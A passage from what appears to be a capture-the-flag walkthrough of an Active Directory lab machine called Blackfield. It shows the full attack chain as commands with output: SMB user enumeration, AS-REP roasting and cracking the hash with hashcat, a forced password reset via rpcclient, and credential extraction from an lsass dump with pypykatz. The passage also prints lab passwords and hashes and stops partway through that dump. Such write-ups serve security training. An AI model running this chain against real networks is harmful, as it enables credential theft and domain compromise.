MVanarsdel                          D        0  Wed Jun  3 18:47:12 2020 - NBellibas                           D        0  Wed Jun  3 18:47:12 2020 - NDikoka                             D        0  Wed Jun  3 18:47:12 2020 - NGenevro                            D        0  Wed Jun  3 18:47:12 2020 - NGoddanti                           D        0  Wed Jun  3 18:47:12 2020 - NMrdirk                             D        0  Wed Jun  3 18:47:12 2020 - NPulido                             D        0  Wed Jun  3 18:47:12 2020 - NRonges                             D        0  Wed Jun  3 18:47:12 2020 - NSchepkie                           D        0  Wed Jun  3 18:47:12 2020 - NVanpraet                           D        0  Wed Jun  3 18:47:12 2020 - OBelghazi                           D        0  Wed Jun  3 18:47:12 2020 - OBushey                             D        0  Wed Jun  3 18:47:12 2020 - OHardybala                          D        0  Wed Jun  3 18:47:12 2020 - OLunas                              D        0  Wed Jun  3 18:47:12 2020 - ORbabka                             D        0  Wed Jun  3 18:47:12 2020 - PBourrat                            D        0  Wed Jun  3 18:47:12 2020 - PBozzelle                           D        0  Wed Jun  3 18:47:12 2020 - PBranti                             D        0  Wed Jun  3 18:47:12 2020 - PCapperella                         D        0  Wed Jun  3 18:47:12 2020 - PCurtz                              D        0  Wed Jun  3 18:47:12 2020 - PDoreste                            D        0  Wed Jun  3 18:47:12 2020 - PGegnas                             D        0  Wed Jun  3 18:47:12 2020 - PMasulla                            D        0  Wed Jun  3 18:47:12 2020 - PMendlinger                         D        0  Wed Jun  3 18:47:12 2020 - PParakat                            D        0  Wed Jun  3 18:47:12 2020 - PProvencer                          D        0  Wed Jun  3 18:47:12 2020 - PTesik                              D        0  Wed Jun  3 18:47:12 2020 - PVinkovich                          D        0  Wed Jun  3 18:47:12 2020 - PVirding                            D        0  Wed Jun  3 18:47:12 2020 - PWeinkaus                           D        0  Wed Jun  3 18:47:12 2020 - RBaliukonis                         D        0  Wed Jun  3 18:47:12 2020 - RBochare                            D        0  Wed Jun  3 18:47:12 2020 - RKrnjaic                            D        0  Wed Jun  3 18:47:12 2020 - RNemnich                            D        0  Wed Jun  3 18:47:12 2020 - RPoretsky                           D        0  Wed Jun  3 18:47:12 2020 - RStuehringer                        D        0  Wed Jun  3 18:47:12 2020 - RSzewczuga                          D        0  Wed Jun  3 18:47:12 2020 - RVallandas                          D        0  Wed Jun  3 18:47:12 2020 - RWeatherl                           D        0  Wed Jun  3 18:47:12 2020 - RWissor                             D        0  Wed Jun  3 18:47:12 2020 - SAbdulagatov                        D        0  Wed Jun  3 18:47:12 2020 - SAjowi                              D        0  Wed Jun  3 18:47:12 2020 - SAlguwaihes                         D        0  Wed Jun  3 18:47:12 2020 - SBonaparte                          D        0  Wed Jun  3 18:47:12 2020 - SBouzane                            D        0  Wed Jun  3 18:47:12 2020 - SChatin                             D        0  Wed Jun  3 18:47:12 2020 - SDellabitta                         D        0  Wed Jun  3 18:47:12 2020 - SDhodapkar                          D        0  Wed Jun  3 18:47:12 2020 - SEulert                             D        0  Wed Jun  3 18:47:12 2020 - SFadrigalan                         D        0  Wed Jun  3 18:47:12 2020 - SGolds                              D        0  Wed Jun  3 18:47:12 2020 - SGrifasi                            D        0  Wed Jun  3 18:47:12 2020 - SGtlinas                            D        0  Wed Jun  3 18:47:12 2020 - SHauht                              D        0  Wed Jun  3 18:47:12 2020 - SHederian                           D        0  Wed Jun  3 18:47:12 2020 - SHelregel                           D        0  Wed Jun  3 18:47:12 2020 - SKrulig                             D        0  Wed Jun  3 18:47:12 2020 - SLewrie                             D        0  Wed Jun  3 18:47:12 2020 - SMaskil                             D        0  Wed Jun  3 18:47:12 2020 - Smocker                             D        0  Wed Jun  3 18:47:12 2020 - SMoyta                              D        0  Wed Jun  3 18:47:12 2020 - SRaustiala                          D        0  Wed Jun  3 18:47:12 2020 - SReppond                            D        0  Wed Jun  3 18:47:12 2020 - SSicliano                           D        0  Wed Jun  3 18:47:12 2020 - SSilex                              D        0  Wed Jun  3 18:47:12 2020 - SSolsbak                            D        0  Wed Jun  3 18:47:12 2020 - STousignaut                         D        0  Wed Jun  3 18:47:12 2020 - support                             D        0  Wed Jun  3 18:47:12 2020 - svc_backup                          D        0  Wed Jun  3 18:47:12 2020 - SWhyte                              D        0  Wed Jun  3 18:47:12 2020 - SWynigear                           D        0  Wed Jun  3 18:47:12 2020 - TAwaysheh                           D        0  Wed Jun  3 18:47:12 2020 - TBadenbach                          D        0  Wed Jun  3 18:47:12 2020 - TCaffo                              D        0  Wed Jun  3 18:47:12 2020 - TCassalom                           D        0  Wed Jun  3 18:47:12 2020 - TEiselt                             D        0  Wed Jun  3 18:47:12 2020 - TFerencdo                           D        0  Wed Jun  3 18:47:12 2020 - TGaleazza                           D        0  Wed Jun  3 18:47:12 2020 - TKauten                             D        0  Wed Jun  3 18:47:12 2020 - TKnupke                             D        0  Wed Jun  3 18:47:12 2020 - TLintlop                            D        0  Wed Jun  3 18:47:12 2020 - TMusselli                           D        0  Wed Jun  3 18:47:12 2020 - TOust                               D        0  Wed Jun  3 18:47:12 2020 - TSlupka                             D        0  Wed Jun  3 18:47:12 2020 - TStausland                          D        0  Wed Jun  3 18:47:12 2020 - TZumpella                           D        0  Wed Jun  3 18:47:12 2020 - UCrofskey                           D        0  Wed Jun  3 18:47:12 2020 - UMarylebone                         D        0  Wed Jun  3 18:47:12 2020 - UPyrke                              D        0  Wed Jun  3 18:47:12 2020 - VBublavy                            D        0  Wed Jun  3 18:47:12 2020 - VButziger                           D        0  Wed Jun  3 18:47:12 2020 - VFuscca                             D        0  Wed Jun  3 18:47:12 2020 - VLitschauer                         D        0  Wed Jun  3 18:47:12 2020 - VMamchuk                            D        0  Wed Jun  3 18:47:12 2020 - VMarija                             D        0  Wed Jun  3 18:47:12 2020 - VOlaosun                            D        0  Wed Jun  3 18:47:12 2020 - VPapalouca                          D        0  Wed Jun  3 18:47:12 2020 - WSaldat                             D        0  Wed Jun  3 18:47:12 2020 - WVerzhbytska                        D        0  Wed Jun  3 18:47:12 2020 - WZelazny                            D        0  Wed Jun  3 18:47:12 2020 - XBemelen                            D        0  Wed Jun  3 18:47:12 2020 - XDadant                             D        0  Wed Jun  3 18:47:12 2020 - XDebes                              D        0  Wed Jun  3 18:47:12 2020 - XKonegni                            D        0  Wed Jun  3 18:47:12 2020 - XRykiel                             D        0  Wed Jun  3 18:47:12 2020 - YBleasdale                          D        0  Wed Jun  3 18:47:12 2020 - YHuftalin                           D        0  Wed Jun  3 18:47:12 2020 - YKivlen                             D        0  Wed Jun  3 18:47:12 2020 - YKozlicki                           D        0  Wed Jun  3 18:47:12 2020 - YNyirenda                           D        0  Wed Jun  3 18:47:12 2020 - YPredestin                          D        0  Wed Jun  3 18:47:12 2020 - YSeturino                           D        0  Wed Jun  3 18:47:12 2020 - YSkoropada                          D        0  Wed Jun  3 18:47:12 2020 - YVonebers                           D        0  Wed Jun  3 18:47:12 2020 - YZarpentine                         D        0  Wed Jun  3 18:47:12 2020 - ZAlatti                             D        0  Wed Jun  3 18:47:12 2020 - ZKrenselewski                       D        0  Wed Jun  3 18:47:12 2020 - ZMalaab                             D        0  Wed Jun  3 18:47:12 2020 - ZMiick                              D        0  Wed Jun  3 18:47:12 2020 - ZScozzari                           D        0  Wed Jun  3 18:47:12 2020 - ZTimofeeff                          D        0  Wed Jun  3 18:47:12 2020 - ZWausik                             D        0  Wed Jun  3 18:47:12 2020 - -               5102079 blocks of size 4096. 1692102 blocks available -``` - -We got a lot of users, unfortunately only their first initial and their last name, no full name. - -We still make a full username list out of it : - -```bash ->  smbclient -N //10.129.229.17/profiles\$ -U 'BLACKFIELD\guest%' -c 'ls' 2>/dev/null | awk '$2=="D" && $1!="." && $1!=".." {print $1}' | sort -u > /tmp/blackfield_users.txt && wc -l /tmp/blackfield_users.txt -``` - -We have some outliars though if we look more closely : `svc_backup ; audit2020`. - -Since we got an incomplete fullport nmap, maybe there are some vhosts that might give us the actual DC name and more information. - -We try `fuzzing vhosts, subdomains and domains` and `katana headless` but we don't find anything, so we have to find another way in. - -We'll `AS-REP roast` the `blackfield_users.txt` userlist with `Impacket`, since we don't have the `DC` name we'll use `BLACKFIELD.local` : - -```bash ->  GetNPUsers.py BLACKFIELD.local/ -no-pass -usersfile /tmp/blackfield_users.txt -dc-ip 10.129.229.17 -request 2>&1 | tee /tmp/blackfield_asrep.txt -``` - -`[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set` - -and -``` -$krb5asrep$23$support@BLACKFIELD.LOCAL:3c6339c56d3b666cc10c527e458979e0$3a705053390f0682d31ae496b0f6cdcb0d616b3784b77dc214e1f2f1f84430fea3c037d719df7f1dae1e344f469892c9ef5ac3a26234234f8e29233c88df7c30e55d93b899 -d20e244a68144136326a98887cbc74fb2e4d7d9779699dbe71bdeb1768d12347f2212e46b803a48c29b74b8ad9f3a0fc8def0734c99ae9b018a4c73deb82f500e8e4efa637f238aaffeed37ed24e8e8c16123fb4fb14686f2ea56a8707a5eec7f3a873abd94ca5c3cb -b2ecd6297976ead597fae225113806ce0b1cbee5b34c14c95abb3517d7d42b0fe67fa88df76630292b17ee3e88a6509cf85751755ea7837b118e31491cb54758667f61803272 -[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set` -``` - -So we got a `Kerberos AS-REP` hash. - -```bash ->  printf '$krb5asrep$23$support@BLACKFIELD.LOCAL:3c6339c56d3b666cc10c527e458979e0$3a705053390f0682d31ae496b0f6cdcb0d616b3784b77dc214e1f2f1f84430fea3c037d719df7f1dae1e344f469892c9ef5ac3a26234234f8e29233c88df7c3 -0e55d93b899d20e244a68144136326a98887cbc74fb2e4d7d9779699dbe71bdeb1768d12347f2212e46b803a48c29b74b8ad9f3a0fc8def0734c99ae9b018a4c73deb82f500e8e4efa637f238aaffeed37ed24e8e8c16123fb4fb14686f2ea56a8707a5eec7f3a873a -bd94ca5c3cbb2ecd6297976ead597fae225113806ce0b1cbee5b34c14c95abb3517d7d42b0fe67fa88df76630292b17ee3e88a6509cf85751755ea7837b118e31491cb54758667f61803272' > black.hash ->  cat black.hash -$krb5asrep$23$support@BLACKFIELD.LOCAL:3c6339c56d3b666cc10c527e458979e0$3a705053390f0682d31ae496b0f6cdcb0d616b3784b77dc214e1f2f1f84430fea3c037d719df7f1dae1e344f469892c9ef5ac3a26234234f8e29233c88df7c30e55d93b899 -d20e244a68144136326a98887cbc74fb2e4d7d9779699dbe71bdeb1768d12347f2212e46b803a48c29b74b8ad9f3a0fc8def0734c99ae9b018a4c73deb82f500e8e4efa637f238aaffeed37ed24e8e8c16123fb4fb14686f2ea56a8707a5eec7f3a873abd94ca5c3cb -b2ecd6297976ead597fae225113806ce0b1cbee5b34c14c95abb3517d7d42b0fe67fa88df76630292b17ee3e88a6509cf85751755ea7837b118e31491cb54758667f61803272% -``` - -Since it's a `kerberos AS-REP` for `support` (``$krb5asrep$23$username@...`) we'll use `hashcat -m 18200`. - -```bash ->  hashcat -m 18200 black.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -hashcat (v7.1.2) starting - -OpenCL API (OpenCL 3.0 PoCL 7.1  Linux, Release, RELOC, LLVM 20.1.8, SLEEF, DISTRO, CUDA, POCL_DEBUG) - Platform #1 [The pocl project] -====================================================================================================================================== -* Device #01: cpu-haswell-AMD Ryzen 5 3500U with Radeon Vega Mobile Gfx, 8912/17824 MB (8912 MB allocatable), 8MCU - -Minimum password length supported by kernel: 0 -Maximum password length supported by kernel: 256 -Minimum salt length supported by kernel: 0 -Maximum salt length supported by kernel: 256 - -Hashes: 1 digests; 1 unique digests, 1 unique salts -Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates -Rules: 1 - -Optimizers applied: -* Zero-Byte -* Not-Iterated -* Single-Hash -* Single-Salt - -ATTENTION! Pure (unoptimized) backend kernels selected. -Pure kernels can crack longer passwords, but drastically reduce performance. -If you want to switch to optimized kernels, append -O to your commandline. -See the above message to find out about the exact limits. - -Watchdog: Temperature abort trigger set to 90c - -Host memory allocated for this attack: 514 MB (10854 MB free) - -Dictionary cache hit: -* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -* Passwords.: 14344384 -* Bytes.....: 139921497 -* Keyspace..: 14344384 - -Cracking performance lower than expected?                   - -* Append -O to the commandline. - This lowers the maximum supported password/salt length (usually down to 32). - -* Append -w 3 to the commandline. - This can cause your screen to lag. - -* Append -S to the commandline. - This has a drastic speed impact but can be better for specific attacks. - Typical scenarios are a small wordlist but a large ruleset. - -* Update your backend API runtime / driver the right way: - https://hashcat.net/faq/wrongdriver - -* Create more work items to make use of your parallelization power: - https://hashcat.net/faq/morework - -$krb5asrep$23$support@BLACKFIELD.LOCAL:3c6339c56d3b666cc10c527e458979e0$3a705053390f0682d31ae496b0f6cdcb0d616b3784b77dc214e1f2f1f84430fea3c037d719df7f1dae1e344f469892c9ef5ac3a26234234f8e29233c88df7c30e55d93b899 -d20e244a68144136326a98887cbc74fb2e4d7d9779699dbe71bdeb1768d12347f2212e46b803a48c29b74b8ad9f3a0fc8def0734c99ae9b018a4c73deb82f500e8e4efa637f238aaffeed37ed24e8e8c16123fb4fb14686f2ea56a8707a5eec7f3a873abd94ca5c3cb -b2ecd6297976ead597fae225113806ce0b1cbee5b34c14c95abb3517d7d42b0fe67fa88df76630292b17ee3e88a6509cf85751755ea7837b118e31491cb54758667f61803272:#00^BlackKnight -                                                           -Session..........: hashcat -Status...........: Cracked -Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP) -Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:3c6339c56d3b...803272 -Time.Started.....: Thu Jun 11 22:00:47 2026 (10 secs) -Time.Estimated...: Thu Jun 11 22:00:57 2026 (0 secs) -Kernel.Feature...: Pure Kernel (password length 0-256 bytes) -Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) -Guess.Queue......: 1/1 (100.00%) -Speed.#01........:  1358.9 kH/s (4.20ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 -Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) -Progress.........: 14336000/14344384 (99.94%) -Rejected.........: 0/14336000 (0.00%) -Restore.Point....: 14327808/14344384 (99.88%) -Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1 -Candidate.Engine.: Device Generator -Candidates.#01...: $CaRaMeL -> #!hottie -Hardware.Mon.#01.: Temp: 72c Util: 70% - -Started: Thu Jun 11 22:00:46 2026 -Stopped: Thu Jun 11 22:00:59 2026 -``` - -We got our password : `#00^BlackKnight`. -And our username from the ticket `support` from `support@BLACKFIELD.LOCAL`. - -We'll try `netexec` with this combination : - -```bash ->  nxc smb 10.129.229.17 -u support -p '#00^BlackKnight' --shares -SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight   -SMB         10.129.229.17   445    DC01             [*] Enumerated shares -SMB         10.129.229.17   445    DC01             Share           Permissions     Remark -SMB         10.129.229.17   445    DC01             -----           -----------     ------ -SMB         10.129.229.17   445    DC01             ADMIN$                          Remote Admin -SMB         10.129.229.17   445    DC01             C$                              Default share -SMB         10.129.229.17   445    DC01             forensic                        Forensic / Audit share. -SMB         10.129.229.17   445    DC01             IPC$            READ            Remote IPC -SMB         10.129.229.17   445    DC01             NETLOGON        READ            Logon server share   -SMB         10.129.229.17   445    DC01             profiles$       READ              -SMB         10.129.229.17   445    DC01             SYSVOL          READ            Logon server share -``` - -We have `READ` on `NETLOGON` and `SYSVOL` and we got our first actual `user`. - -Time to use `bloodhound` to see `support`'s `Outbound Control` privileges : - -First, we download the database : - -```bash ->  bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.129.229.17 -c All --zip - -INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) -INFO: Found AD domain: blackfield.local -INFO: Getting TGT for user -WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known -INFO: Connecting to LDAP server: dc01.blackfield.local -INFO: Testing resolved hostname connectivity dead:beef::75fb:1ed7:8dd6:be87 -INFO: Trying LDAP connection to dead:beef::75fb:1ed7:8dd6:be87 -INFO: Found 1 domains -INFO: Found 1 domains in the forest -INFO: Found 18 computers -INFO: Connecting to LDAP server: dc01.blackfield.local -INFO: Testing resolved hostname connectivity dead:beef::75fb:1ed7:8dd6:be87 -INFO: Trying LDAP connection to dead:beef::75fb:1ed7:8dd6:be87 -INFO: Found 316 users -INFO: Found 52 groups -INFO: Found 2 gpos -INFO: Found 1 ous -INFO: Found 19 containers -INFO: Found 0 trusts -INFO: Starting computer enumeration with 10 workers -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer:   -INFO: Querying computer: DC01.BLACKFIELD.local -INFO: Done in 00M 36S -INFO: Compressing output into 20260611221758_bloodhound.zip -``` - -We add `DC01.BLACKFIELD.local` to our hosts : - -```bash ->  echo "10.129.229.17 blackfield.htb BLACKFIELD.local DC01.BLACKFIELD.local" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.229.17 blackfield.htb BLACKFIELD.local DC01.BLACKFIELD.local -``` - -And we open the database in `bloodhound`. - -We have `ForceChangePassword` on `audit2020` - -We check the password policy : - -```bash ->  nxc smb 10.129.229.17 -u support -p '#00^BlackKnight' --pass-pol - -SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight   -SMB         10.129.229.17   445    DC01             [+] Dumping password info for domain: BLACKFIELD -SMB         10.129.229.17   445    DC01             Minimum password length: 7 -SMB         10.129.229.17   445    DC01             Password history length: 24 -SMB         10.129.229.17   445    DC01             Maximum password age: 41 days 23 hours 53 minutes   -SMB         10.129.229.17   445    DC01               -SMB         10.129.229.17   445    DC01             Password Complexity Flags: 000001 -SMB         10.129.229.17   445    DC01                 Domain Refuse Password Change: 0 -SMB         10.129.229.17   445    DC01                 Domain Password Store Cleartext: 0 -SMB         10.129.229.17   445    DC01                 Domain Password Lockout Admins: 0 -SMB         10.129.229.17   445    DC01                 Domain Password No Clear Change: 0 -SMB         10.129.229.17   445    DC01                 Domain Password No Anon Change: 0 -SMB         10.129.229.17   445    DC01                 Domain Password Complex: 1 -SMB         10.129.229.17   445    DC01               -SMB         10.129.229.17   445    DC01             Minimum password age: 1 day 4 minutes   -SMB         10.129.229.17   445    DC01             Reset Account Lockout Counter: 30 minutes   -SMB         10.129.229.17   445    DC01             Locked Account Duration: 30 minutes   -SMB         10.129.229.17   445    DC01             Account Lockout Threshold: None -SMB         10.129.229.17   445    DC01             Forced Log off Time: Not Set -``` - -And we change the password to access our new user : - -```bash ->  rpcclient -U 'BLACKFIELD/support%#00^BlackKnight' 10.129.229.17 -c 'setuserinfo2 audit2020 23 "Skelet0nephilim"' ->  nxc smb 10.129.229.17 -u audit2020 -p 'Skelet0nephilim' --shares -SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\audit2020:Skelet0nephilim   -SMB         10.129.229.17   445    DC01             [*] Enumerated shares -SMB         10.129.229.17   445    DC01             Share           Permissions     Remark -SMB         10.129.229.17   445    DC01             -----           -----------     ------ -SMB         10.129.229.17   445    DC01             ADMIN$                          Remote Admin -SMB         10.129.229.17   445    DC01             C$                              Default share -SMB         10.129.229.17   445    DC01             forensic        READ            Forensic / Audit share. -SMB         10.129.229.17   445    DC01             IPC$            READ            Remote IPC -SMB         10.129.229.17   445    DC01             NETLOGON        READ            Logon server share   -SMB         10.129.229.17   445    DC01             profiles$       READ              -SMB         10.129.229.17   445    DC01             SYSVOL          READ            Logon server share -``` - -We have `READ` on `forensic` which should be interesting. - -```bash ->  smbclient //10.129.229.17/forensic -U audit2020%Skelet0nephilim -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Sun Feb 23 14:03:16 2020 - ..                                  D        0  Sun Feb 23 14:03:16 2020 - commands_output                     D        0  Sun Feb 23 19:14:37 2020 - memory_analysis                     D        0  Thu May 28 22:28:33 2020 - tools                               D        0  Sun Feb 23 14:39:08 2020 - -               5102079 blocks of size 4096. 1694654 blocks available -smb: \> cd tools -smb: \tools\> ls - .                                   D        0  Sun Feb 23 14:39:08 2020 - ..                                  D        0  Sun Feb 23 14:39:08 2020 - sleuthkit-4.8.0-win32               D        0  Sun Feb 23 14:39:03 2020 - sysinternals                        D        0  Sun Feb 23 14:35:25 2020 - volatility                          D        0  Sun Feb 23 14:35:39 2020 - -               5102079 blocks of size 4096. 1694654 blocks available -smb: \tools\> cd sleuthkit-4.8.0-win32 -smb: \tools\sleuthkit-4.8.0-win32\> ls - .                                   D        0  Sun Feb 23 14:39:03 2020 - ..                                  D        0  Sun Feb 23 14:39:03 2020 - bin                                 D        0  Sun Feb 23 14:39:02 2020 - lib                                 D        0  Sun Feb 23 14:39:02 2020 - licenses                            D        0  Sun Feb 23 14:39:03 2020 - NEWS.txt                            A    87015  Sun Feb 23 14:38:57 2020 - README-win32.txt                    A     2324  Sun Feb 23 14:38:57 2020 - README.txt                          A     8316  Sun Feb 23 14:38:57 2020 - -               5102079 blocks of size 4096. 1694654 blocks available -smb: \tools\sleuthkit-4.8.0-win32\>get NEWS.txt -getting file \tools\sleuthkit-4.8.0-win32\NEWS.txt of size 87015 as NEWS.txt (79.5 KiloBytes/sec) (average 79.5 KiloBytes/sec) -smb: \tools\sleuthkit-4.8.0-win32\> get README-win32.txt -getting file \tools\sleuthkit-4.8.0-win32\README-win32.txt of size 2324 as README-win32.txt (9.9 KiloBytes/sec) (average 67.2 KiloBytes/sec) -smb: \tools\sleuthkit-4.8.0-win32\> get README.txt -getting file \tools\sleuthkit-4.8.0-win32\README.txt of size 8316 as README.txt (29.7 KiloBytes/sec) (average 60.7 KiloBytes/sec) -smb: \tools\sleuthkit-4.8.0-win32\> cd licenses -smb: \tools\sleuthkit-4.8.0-win32\licenses\> ls - .                                   D        0  Sun Feb 23 14:39:03 2020 - ..                                  D        0  Sun Feb 23 14:39:03 2020 - cpl1.0.txt                          A    11613  Sun Feb 23 14:39:03 2020 - IBM-LICENSE                         A    11954  Sun Feb 23 14:39:03 2020 - -               5102079 blocks of size 4096. 1694654 blocks available -smb: \tools\sleuthkit-4.8.0-win32\licenses\> get cpl1.0.txt -getting file \tools\sleuthkit-4.8.0-win32\licenses\cpl1.0.txt of size 11613 as cpl1.0.txt (43.6 KiloBytes/sec) (average 58.3 KiloBytes/sec) -smb: \tools\sleuthkit-4.8.0-win32\licenses\> get IBM-LICENSE -getting file \tools\sleuthkit-4.8.0-win32\licenses\IBM-LICENSE of size 11954 as IBM-LICENSE (39.8 KiloBytes/sec) (average 55.7 KiloBytes/sec) -``` - -Here we got our first sweep. - -```bash ->  smbclient //10.129.229.17/forensic -U 'BLACKFIELD\audit2020%Skelet0nephilim' - -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Sun Feb 23 14:03:16 2020 - ..                                  D        0  Sun Feb 23 14:03:16 2020 - commands_output                     D        0  Sun Feb 23 19:14:37 2020 - memory_analysis                     D        0  Thu May 28 22:28:33 2020 - tools                               D        0  Sun Feb 23 14:39:08 2020 - -               5102079 blocks of size 4096. 1694654 blocks available -smb: \> cd memory_analysis -smb: \memory_analysis\> ls - .                                   D        0  Thu May 28 22:28:33 2020 - ..                                  D        0  Thu May 28 22:28:33 2020 - conhost.zip                         A 37876530  Thu May 28 22:25:36 2020 - ctfmon.zip                          A 24962333  Thu May 28 22:25:45 2020 - dfsrs.zip                           A 23993305  Thu May 28 22:25:54 2020 - dllhost.zip                         A 18366396  Thu May 28 22:26:04 2020 - ismserv.zip                         A  8810157  Thu May 28 22:26:13 2020 - lsass.zip                           A 41936098  Thu May 28 22:25:08 2020 - mmc.zip                             A 64288607  Thu May 28 22:25:25 2020 - RuntimeBroker.zip                   A 13332174  Thu May 28 22:26:24 2020 - ServerManager.zip                   A 131983313  Thu May 28 22:26:49 2020 - sihost.zip                          A 33141744  Thu May 28 22:27:00 2020 - smartscreen.zip                     A 33756344  Thu May 28 22:27:11 2020 - svchost.zip                         A 14408833  Thu May 28 22:27:19 2020 - taskhostw.zip                       A 34631412  Thu May 28 22:27:30 2020 - winlogon.zip                        A 14255089  Thu May 28 22:27:38 2020 - wlms.zip                            A  4067425  Thu May 28 22:27:44 2020 - WmiPrvSE.zip                        A 18303252  Thu May 28 22:27:53 2020 - -               5102079 blocks of size 4096. 1694654 blocks available -smb: \memory_analysis\> get lsass.zip -parallel_read returned NT_STATUS_IO_TIMEOUT -``` - -We got a timeout, so we'll add `-t 1200` : - -```bash ->  smbclient //10.129.229.17/forensic -U 'BLACKFIELD\audit2020%Skelet0nephilim' -t 1200 - -Try "help" to get a list of possible commands. -smb: \> cd memory_analysis -smb: \memory_analysis\> get lsass.zip -getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (1308.8 KiloBytes/sec) (average 1308.8 KiloBytes/sec) -smb: \memory_analysis\> exit ->  mkdir -p /tmp/blackforensic ->  mv lsass.zip /tmp/blackforensic/ ->  cd /tmp/blackforensic ->  ls -lsass.zip -``` - -And we got it. - -```bash ->  unzip -l lsass.zip -Archive:  lsass.zip - Length      Date    Time    Name ----------  ---------- -----   ---- -143044222  2020-02-23 11:02   lsass.DMP ----------                     ------- -143044222                     1 file ->  unzip -o lsass.zip -Archive:  lsass.zip - inflating: lsass.DMP                 ->  pypykatz lsa minidump lsass.DMP -INFO:pypykatz:Parsing file lsass.DMP -FILE: ======== lsass.DMP ======= -== LogonSession == -authentication_id 406458 (633ba) -session_id 2 -username svc_backup -domainname BLACKFIELD -logon_server DC01 -logon_time 2020-02-23T18:00:03.423728+00:00 -sid S-1-5-21-4194615774-2175524697-3563712290-1413 -luid 406458 -       == MSV == -               Username: svc_backup -               Domain: BLACKFIELD -               LM: NA -               NT: 9658d1d1dcd9250115e2205d9f48400d -               SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c -               DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000 -       == WDIGEST [633ba]== -               username svc_backup -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: svc_backup -               Domain: BLACKFIELD.LOCAL -               AES128 Key: 9658d1d1dcd9250115e2205d9f48400d -               AES256 Key: 20a3e879a3a0ca4f51db1e63514a27ac18eef553d8f30c29805c398c97599e91 -       == WDIGEST [633ba]== -               username svc_backup -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 365835 (5950b) -session_id 2 -username UMFD-2 -domainname Font Driver Host -logon_server   -logon_time 2020-02-23T17:59:38.218491+00:00 -sid S-1-5-96-0-2 -luid 365835 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [5950b]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.local -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44 -       == WDIGEST [5950b]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 365493 (593b5) -session_id 2 -username UMFD-2 -domainname Font Driver Host -logon_server   -logon_time 2020-02-23T17:59:38.200147+00:00 -sid S-1-5-96-0-2 -luid 365493 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [593b5]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.local -               Password: 